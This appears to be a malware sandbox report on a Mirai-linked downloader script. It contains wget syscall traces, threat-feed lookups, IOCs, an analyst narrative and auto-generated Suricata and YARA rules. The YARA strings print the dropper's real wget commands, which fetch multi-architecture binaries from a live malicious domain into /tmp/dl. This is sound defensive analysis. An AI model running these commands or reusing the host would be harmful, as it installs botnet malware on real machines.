read
/usr/share/locale/locale.alias
syscall_trace
- pid 686 22:10:40.689168
read
/usr/share/locale/en_US.UTF-8/LC_MESSAGES/wget.mo
syscall_trace
- pid 686 22:10:40.690929
read
/usr/share/locale/en_US.utf8/LC_MESSAGES/wget.mo
syscall_trace
- pid 686 22:10:40.691310
read
/usr/share/locale/en_US/LC_MESSAGES/wget.mo
syscall_trace
- pid 686 22:10:40.691681
read
/usr/share/locale/en.UTF-8/LC_MESSAGES/wget.mo
syscall_trace
- pid 686 22:10:40.692040
read
/usr/share/locale/en.utf8/LC_MESSAGES/wget.mo
syscall_trace
- pid 686 22:10:40.692501
read
/usr/share/locale/en/LC_MESSAGES/wget.mo
syscall_trace
- pid 686 22:10:40.692861
read
/usr/share/locale-langpack/en_US.UTF-8/LC_MESSAGES/wget.mo
syscall_trace
- pid 686 22:10:40.693315
read
/usr/share/locale-langpack/en_US.utf8/LC_MESSAGES/wget.mo
syscall_trace
- pid 686 22:10:40.693684
read
/usr/share/locale-langpack/en_US/LC_MESSAGES/wget.mo
syscall_trace
- pid 686 22:10:40.694042
read
/usr/share/locale-langpack/en.UTF-8/LC_MESSAGES/wget.mo
syscall_trace
- pid 686 22:10:40.694454
read
/usr/share/locale-langpack/en.utf8/LC_MESSAGES/wget.mo
syscall_trace
- pid 686 22:10:40.694813
read
/usr/share/locale-langpack/en/LC_MESSAGES/wget.mo
syscall_trace
- pid 686 22:10:40.695175
read
/etc/nsswitch.conf
syscall_trace
- pid 686 22:10:40.698465
read
/etc/host.conf
syscall_trace
- pid 686 22:10:40.700547
read
/etc/resolv.conf
syscall_trace
- pid 686 22:10:40.702099
read
/etc/hosts
syscall_trace
- pid 686 22:10:40.703674
read
/usr/share/locale/en_US.UTF-8/LC_MESSAGES/libc.mo
syscall_trace
- pid 686 22:10:40.724434
read
/usr/share/locale/en_US.utf8/LC_MESSAGES/libc.mo
syscall_trace
- pid 686 22:10:40.724684
read
/usr/share/locale/en_US/LC_MESSAGES/libc.mo
syscall_trace
- pid 686 22:10:40.724922
read
/usr/share/locale/en.UTF-8/LC_MESSAGES/libc.mo
syscall_trace
- pid 686 22:10:40.725165
read
/usr/share/locale/en.utf8/LC_MESSAGES/libc.mo
syscall_trace
- pid 686 22:10:40.725453
read
/usr/share/locale/en/LC_MESSAGES/libc.mo
syscall_trace
- pid 686 22:10:40.725691
read
/usr/share/locale-langpack/en_US.UTF-8/LC_MESSAGES/libc.mo
syscall_trace
- pid 686 22:10:40.725929
read
/usr/share/locale-langpack/en_US.utf8/LC_MESSAGES/libc.mo
syscall_trace
- pid 686 22:10:40.726166
read
/usr/share/locale-langpack/en_US/LC_MESSAGES/libc.mo
syscall_trace
- pid 686 22:10:40.726429
read
/usr/share/locale-langpack/en.UTF-8/LC_MESSAGES/libc.mo
syscall_trace
- pid 686 22:10:40.726673
read
/usr/share/locale-langpack/en.utf8/LC_MESSAGES/libc.mo
syscall_trace
- pid 686 22:10:40.726910
read
/usr/share/locale-langpack/en/LC_MESSAGES/libc.mo
syscall_trace
- pid 686 22:10:40.727146
read
/usr/share/locale/en_US.UTF-8/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 686 22:10:40.727829
read
/usr/share/locale/en_US.utf8/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 686 22:10:40.728168
read
/usr/share/locale/en_US/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 686 22:10:40.728416
read
/usr/share/locale/en.UTF-8/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 686 22:10:40.728754
read
/usr/share/locale/en.utf8/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 686 22:10:40.729092
read
/usr/share/locale/en/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 686 22:10:40.729346
read
/usr/share/locale-langpack/en_US.UTF-8/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 686 22:10:40.729688
read
/usr/share/locale-langpack/en_US.utf8/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 686 22:10:40.730033
read
/usr/share/locale-langpack/en_US/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 686 22:10:40.730369
read
/usr/share/locale-langpack/en.UTF-8/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 686 22:10:40.730720
read
/usr/share/locale-langpack/en.utf8/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 686 22:10:40.731057
read
/usr/share/locale-langpack/en/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 686 22:10:40.731546
create
/dev/null
syscall_trace
- pid 681 22:10:40.735171
read
/etc/ld.so.cache
syscall_trace
- pid 687 22:10:40.739369
read
/lib/x86_64-linux-gnu/libpcre2-8.so.0
syscall_trace
- pid 687 22:10:40.740520
read
/lib/x86_64-linux-gnu/libuuid.so.1
syscall_trace
- pid 687 22:10:40.742796
read
/lib/x86_64-linux-gnu/libidn2.so.0
syscall_trace
- pid 687 22:10:40.745294
read
/lib/x86_64-linux-gnu/libssl.so.3
syscall_trace
- pid 687 22:10:40.747576
read
/lib/x86_64-linux-gnu/libcrypto.so.3
syscall_trace
- pid 687 22:10:40.749886
read
/lib/x86_64-linux-gnu/libz.so.1
syscall_trace
- pid 687 22:10:40.752507
read
/lib/x86_64-linux-gnu/libpsl.so.5
syscall_trace
- pid 687 22:10:40.755148
read
/lib/x86_64-linux-gnu/libc.so.6
syscall_trace
- pid 687 22:10:40.757343
read
/lib/x86_64-linux-gnu/libunistring.so.5
syscall_trace
- pid 687 22:10:40.760819
read
/usr/lib/locale/locale-archive
syscall_trace
- pid 687 22:10:40.771890
read
/etc/wgetrc
syscall_trace
- pid 687 22:10:40.773803
create
/tmp/dl/main_powerpc
syscall_trace
- pid 687 22:10:40.776800
read
/etc/localtime
syscall_trace
- pid 687 22:10:40.780275
read
/usr/share/locale/locale.alias
syscall_trace
- pid 687 22:10:40.783823
read
/usr/share/locale/en_US.UTF-8/LC_MESSAGES/wget.mo
syscall_trace
- pid 687 22:10:40.785951
read
/usr/share/locale/en_US.utf8/LC_MESSAGES/wget.mo
syscall_trace
- pid 687 22:10:40.786403
read
/usr/share/locale/en_US/LC_MESSAGES/wget.mo
syscall_trace
- pid 687 22:10:40.786829
read
/usr/share/locale/en.UTF-8/LC_MESSAGES/wget.mo
syscall_trace
- pid 687 22:10:40.787348
read
/usr/share/locale/en.utf8/LC_MESSAGES/wget.mo
syscall_trace
- pid 687 22:10:40.787825
read
/usr/share/locale/en/LC_MESSAGES/wget.mo
syscall_trace
- pid 687 22:10:40.788269
read
/usr/share/locale-langpack/en_US.UTF-8/LC_MESSAGES/wget.mo
syscall_trace
- pid 687 22:10:40.788677
read
/usr/share/locale-langpack/en_US.utf8/LC_MESSAGES/wget.mo
syscall_trace
- pid 687 22:10:40.789083
read
/usr/share/locale-langpack/en_US/LC_MESSAGES/wget.mo
syscall_trace
- pid 687 22:10:40.789466
read
/usr/share/locale-langpack/en.UTF-8/LC_MESSAGES/wget.mo
syscall_trace
- pid 687 22:10:40.789877
read
/usr/share/locale-langpack/en.utf8/LC_MESSAGES/wget.mo
syscall_trace
- pid 687 22:10:40.790314
read
/usr/share/locale-langpack/en/LC_MESSAGES/wget.mo
syscall_trace
- pid 687 22:10:40.790759
read
/etc/nsswitch.conf
syscall_trace
- pid 687 22:10:40.795414
read
/etc/host.conf
syscall_trace
- pid 687 22:10:40.797767
read
/etc/resolv.conf
syscall_trace
- pid 687 22:10:40.799545
read
/etc/hosts
syscall_trace
- pid 687 22:10:40.801285
read
/usr/share/locale/en_US.UTF-8/LC_MESSAGES/libc.mo
syscall_trace
- pid 687 22:10:40.822207
read
/usr/share/locale/en_US.utf8/LC_MESSAGES/libc.mo
syscall_trace
- pid 687 22:10:40.822581
read
/usr/share/locale/en_US/LC_MESSAGES/libc.mo
syscall_trace
- pid 687 22:10:40.822862
read
/usr/share/locale/en.UTF-8/LC_MESSAGES/libc.mo
syscall_trace
- pid 687 22:10:40.823136
read
/usr/share/locale/en.utf8/LC_MESSAGES/libc.mo
syscall_trace
- pid 687 22:10:40.823490
read
/usr/share/locale/en/LC_MESSAGES/libc.mo
syscall_trace
- pid 687 22:10:40.823765
read
/usr/share/locale-langpack/en_US.UTF-8/LC_MESSAGES/libc.mo
syscall_trace
- pid 687 22:10:40.824042
read
/usr/share/locale-langpack/en_US.utf8/LC_MESSAGES/libc.mo
syscall_trace
- pid 687 22:10:40.824425
read
/usr/share/locale-langpack/en_US/LC_MESSAGES/libc.mo
syscall_trace
- pid 687 22:10:40.824700
read
/usr/share/locale-langpack/en.UTF-8/LC_MESSAGES/libc.mo
syscall_trace
- pid 687 22:10:40.824978
read
/usr/share/locale-langpack/en.utf8/LC_MESSAGES/libc.mo
syscall_trace
- pid 687 22:10:40.825309
read
/usr/share/locale-langpack/en/LC_MESSAGES/libc.mo
syscall_trace
- pid 687 22:10:40.825763
read
/usr/share/locale/en_US.UTF-8/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 687 22:10:40.826555
read
/usr/share/locale/en_US.utf8/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 687 22:10:40.827109
read
/usr/share/locale/en_US/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 687 22:10:40.827599
read
/usr/share/locale/en.UTF-8/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 687 22:10:40.827986
read
/usr/share/locale/en.utf8/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 687 22:10:40.828327
read
/usr/share/locale/en/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 687 22:10:40.828725
read
/usr/share/locale-langpack/en_US.UTF-8/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 687 22:10:40.829107
read
/usr/share/locale-langpack/en_US.utf8/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 687 22:10:40.829560
read
/usr/share/locale-langpack/en_US/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 687 22:10:40.829942
read
/usr/share/locale-langpack/en.UTF-8/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 687 22:10:40.830396
read
/usr/share/locale-langpack/en.utf8/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 687 22:10:40.830812
read
/usr/share/locale-langpack/en/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 687 22:10:40.831195
create
/dev/null
syscall_trace
- pid 681 22:10:40.835071
read
/etc/ld.so.cache
syscall_trace
- pid 688 22:10:40.839312
read
/lib/x86_64-linux-gnu/libpcre2-8.so.0
syscall_trace
- pid 688 22:10:40.840560
read
/lib/x86_64-linux-gnu/libuuid.so.1
syscall_trace
- pid 688 22:10:40.842994
read
/lib/x86_64-linux-gnu/libidn2.so.0
syscall_trace
- pid 688 22:10:40.845615
read
/lib/x86_64-linux-gnu/libssl.so.3
syscall_trace
- pid 688 22:10:40.848136
read
/lib/x86_64-linux-gnu/libcrypto.so.3
syscall_trace
- pid 688 22:10:40.850793
read
/lib/x86_64-linux-gnu/libz.so.1
syscall_trace
- pid 688 22:10:40.853713
read
/lib/x86_64-linux-gnu/libpsl.so.5
syscall_trace
- pid 688 22:10:40.856207
read
/lib/x86_64-linux-gnu/libc.so.6
syscall_trace
- pid 688 22:10:40.858871
3 reported a hit 17 answered no 1 could not answer 2 had nothing to check
3Sources with a hit
21Sources queriedof 23 available
486.1kFeed records
1Could not answer

File reputation

2 of 7 listed
SourceChecksResultDetailFeed
MalwareBazaar File hash known sample sh live lookup
MalwareBazaar hash feed File hash listed malwarebazaar: Mirai 2,535 records
6 minutes ago
VirusTotal File hash cannot access rate limited (free-tier quota) live lookup
filescan.io File hash no detections - live lookup
MalwareBazaar ransomware feed File hash clean not in feed 8,271 records
4 hours ago
ThreatFox hash IOCs File hash clean not in feed 1,632 records
6 minutes ago
URLhaus payload hashes File hash clean not in feed 1,474 records
6 minutes ago

Hash lookups only - the sample itself is never uploaded to any third party.

Network indicators

1 of 8 listed
SourceChecksResultDetailFeed
URLhaus IP / domain / URL 13 indicators aura[.]tcplegit[.]space, hxxp[://]aura[.]tcplegit[.]space/main_x86_64… 5,155 records
6 minutes ago
blocklist.de IP / domain / URL clean 7 observed indicators, none listed 24.5k records
6 minutes ago
CINS Army IP / domain / URL clean 7 observed indicators, none listed 15k records
6 minutes ago
Emerging Threats IP / domain / URL clean 7 observed indicators, none listed 580 records
6 minutes ago
Feodo Tracker IP / domain / URL clean 7 observed indicators, none listed 5 records
6 minutes ago
IPsum IP / domain / URL clean 7 observed indicators, none listed 17.7k records
6 minutes ago
Phishing.Database IP / domain / URL clean 7 observed indicators, none listed 391.1k records
4 hours ago
ThreatFox IP / domain / URL clean 7 observed indicators, none listed 1,632 records
6 minutes ago

TLS fingerprints

0 clear
SourceChecksResultDetailFeed
abuse.ch JA3 blocklist JA3 / JA4 not checked no TLS client fingerprint observed 97 records
16 hours ago
SSL blocklist JA3 / JA4 not checked no TLS client fingerprint observed 10.7k records
6 minutes ago

Detection rules

2 clear
SourceChecksResultDetailFeed
Sigma rules Behavior log clean - 2,275 records
22 hours ago
YARA rules Sample content clean no rule matched 110 records
7 minutes ago

Tooling catalogs

4 clear
SourceChecksResultDetailFeed
LOLBAS Process image paths clean 1 process image path, none masqueraded 244 records
7 minutes ago
LOLBootloaders File hash clean not a known vulnerable bootloader 520 records
6 minutes ago
LOLDrivers File hash clean not a known vulnerable driver 2,306 records
6 minutes ago
LOLRMM Names and domains clean 3 name/domain indicators checked, no remote-management tooling 322 records
6 minutes ago

IOC reputation

URLhaus / ThreatFox
IndicatorSourceThreat
hxxp[://]aura[.]tcplegit[.]space/main_x86_64 URLhaus malware_download
hxxp[://]aura[.]tcplegit[.]space/main_aarch64 URLhaus malware_download
hxxp[://]aura[.]tcplegit[.]space/main_mips URLhaus malware_download
hxxp[://]aura[.]tcplegit[.]space/main_arm URLhaus malware_download
hxxp[://]aura[.]tcplegit[.]space/main_powerpc URLhaus malware_download
hxxp[://]aura[.]tcplegit[.]space/main_sh4 URLhaus malware_download

Analyst narrative

The analysis of the sample indicates that it executed successfully within the sandbox environment. The following kill-chain elements were observed: 1. **Initial Access**: The sample initiated execution via a script named `download_and_run.sh`, which suggests it may have been designed to download and execute additional payloads. 2. **Execution**: The sample executed a series of system calls, including `execve`, indicating that it was actively running commands. It spawned a process for the script and utilized various APIs to perform its operations. 3. **Persistence**: There were no specific indicators of persistence mechanisms observed in the analysis. The sample did not attempt to establish any long-term presence on the system. 4. **Defense Evasion**: The sample demonstrated behavior consistent with defense evasion techniques, such as modifying file and directory permissions, which is indicative of attempts to avoid detection. 5. **Command and Control (C2)**: The sample attempted to communicate with a remote server at the domain `aura.tcplegit.space`, as evidenced by DNS queries and the presence of URLs pointing to various executable files hosted on that domain. This suggests that the sample may have been designed to download additional payloads or exfiltrate data. 6. **Impact**: The impact of the sample is not fully determined, but the creation of multiple executable files in the `/tmp/dl/` directory indicates potential malicious intent, possibly to execute further actions on the compromised system. **Verdict Rationale**: The sample exhibited behaviors consistent with malicious activity, including execution of a script, network communication with a potentially malicious domain, and the creation of executable files. Therefore, it is assessed as potentially harmful.

Evasion analysis

No evasive checkpoints detected.

2 malicious 6 suspicious 7 info

Network indicators

7
SeverityTypeIndicatorDescription
info url http://aura.tcplegit.space/main_x86_64 Extracted from the sample's strings
info url http://aura.tcplegit.space/main_aarch64 Extracted from the sample's strings
info url http://aura.tcplegit.space/main_mips Extracted from the sample's strings
info url http://aura.tcplegit.space/main_arm Extracted from the sample's strings
info url http://aura.tcplegit.space/main_powerpc Extracted from the sample's strings
info url http://aura.tcplegit.space/main_sh4 Extracted from the sample's strings
info domain aura.tcplegit.space Observed during analysis

File indicators

8
SeverityTypeIndicatorDescription
malicious sample_sha256 c1080d2170a7fbf9ff0a7c5a23fc706c029f55adac34e1b0ebd270cc63821b92 Submitted sample (SHA256)
malicious sample_md5 386497aed2e4b131a802098ff87c5cc2 Submitted sample (MD5)
suspicious dropped_file /tmp/dl/main_x86_64 Executable written to disk during execution
suspicious dropped_file /tmp/dl/main_aarch64 Executable written to disk during execution
suspicious dropped_file /tmp/dl/main_mips Executable written to disk during execution
suspicious dropped_file /tmp/dl/main_arm Executable written to disk during execution
suspicious dropped_file /tmp/dl/main_powerpc Executable written to disk during execution
suspicious dropped_file /tmp/dl/main_sh4 Executable written to disk during execution

MITRE ATT&CK

4 techniques
Defense Evasion
Linux and Mac File and Directory Permissions Modification
T1222.002
Execution
Native API
T1106
Command and Control
Application Layer Protocol
T1071
Execution
Command and Scripting Interpreter
T1059

Sigma detections

0 matches of 2275 rules

The Sigma corpus was evaluated against this run's processes, registry, file, network, DNS and script activity. Nothing matched.

Generated rules

Suricata/Snort: auto_file_2386_suricata

Auto-generated
alert dns any any -> any any (msg:"sandbox auto scan 2386 C2 domain aura.tcplegit.space"; dns.query; content:"aura.tcplegit.space"; sid:15978176; rev:1;)
alert http any any -> any any (msg:"sandbox auto scan 2386 C2 URL"; http.uri; content:"/main_x86_64"; sid:15978177; rev:1;)
alert http any any -> any any (msg:"sandbox auto scan 2386 C2 URL"; http.uri; content:"/main_aarch64"; sid:15978178; rev:1;)
alert http any any -> any any (msg:"sandbox auto scan 2386 C2 URL"; http.uri; content:"/main_mips"; sid:15978179; rev:1;)
alert http any any -> any any (msg:"sandbox auto scan 2386 C2 URL"; http.uri; content:"/main_arm"; sid:15978180; rev:1;)
alert http any any -> any any (msg:"sandbox auto scan 2386 C2 URL"; http.uri; content:"/main_powerpc"; sid:15978181; rev:1;)
alert http any any -> any any (msg:"sandbox auto scan 2386 C2 URL"; http.uri; content:"/main_sh4"; sid:15978182; rev:1;)

YARA: auto_file_2386_yara

Auto-generated
rule auto_file_2386_yara
{
    meta:
        description = "Auto-generated from scan 2386"
        author = "sandbox auto-generator"
        anchors = "5 independent regions"
    strings:
        $s0 = "wget -O /tmp/dl/main_x86_64 http://aura.tcplegit.space/main_x86_64 2>/dev/null" ascii fullword
        $s1 = "wget -O /tmp/dl/main_sh4 http://aura.tcplegit.space/main_sh4 2>/dev/null" ascii fullword
        $s2 = "wget -O /tmp/dl/main_aarch64 http://aura.tcplegit.space/main_aarch64 2>/dev/null" ascii fullword
        $s3 = "wget -O /tmp/dl/main_powerpc http://aura.tcplegit.space/main_powerpc 2>/dev/null" ascii fullword
        $s4 = "wget -O /tmp/dl/main_mips http://aura.tcplegit.space/main_mips 2>/dev/null" ascii fullword
    condition:
        filesize < 65536 and all of them
}

Extracted files

What came out of the sample: unpacked payloads, carved objects and captured memory. Each one is stored by content hash, so the same object extracted twice is the same row.

No extracted files

Nothing was unpacked or carved out of this sample. Packed samples, documents with embedded objects and installers are the ones that usually produce artifacts here.

Export & download

/s/2386

The report downloads - PCAP and the SIEM/TIP exports - are a paid-plan feature. Sign in with a paid plan to export this report.

AI analysis report

An enterprise report with an AI-written executive summary, threat assessment, kill chain, and recommendations, plus the derived evidence (verdict, MITRE ATT&CK, network, file modifications, dropped files, IOCs) and screenshots. The AI narrative is built from derived analysis data only, so the raw sample never leaves the host (no-upload and AI-boundary preserved).

Public analyses of this file

1 run
SubmittedEnvironmentVerdictScore
2026-09-07 21:46 Shown below Static analysis Malicious 92/100